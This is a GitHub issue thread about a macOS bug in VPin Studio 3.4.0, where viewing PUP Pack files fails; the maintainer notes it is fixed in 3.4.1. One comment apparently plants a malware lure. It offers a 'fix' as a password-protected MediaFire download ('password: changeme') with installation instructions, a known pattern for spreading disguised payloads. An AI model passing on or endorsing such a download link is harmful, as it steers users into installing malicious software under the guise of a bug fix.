### ISSUE TITLE
[Bug] macOS 3.4.0: view additional file in POP Pack Data fails

### ISSUE THREAD

**Issue by gorgatron1** [syd711/vpin-studio#417]
**Describe the bug**

VPin Studio 3.4.0, macOS client

Trying to view a README in a pup pack from [Iron Maiden](https://vpuniverse.com/files/file/12603-iron-maiden-legacy-of-the-beast-original-2022-vpw/?tab=reviews&sort=newest#review-9458) and I get this error message for any file I try to view:

<img width="2176" alt="image" src="https://github.com/user-attachments/assets/aeebe143-9b03-4ad8-9c78-2cda22787d42">

The file in question looks like this:

[WhereAreTheSongs-README.txt](https://github.com/user-attachments/files/16823534/WhereAreTheSongs-README.txt)

**To Reproduce**

1. macOS client (not sure if required)
2. have a table with a PUP Pack and "additional files", e.g. selected.txt
3. select the file in the PUP Pack sidebar
4. press View
5. you get an alert as shown above, no file shown

**Expected behavior**

Expected file contents to be shown.

**Screenshots**

See above

**Desktop (please complete the following information):**
 - OS: macOS 15

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by syd711** [comment]
Fixed with 3.4.1
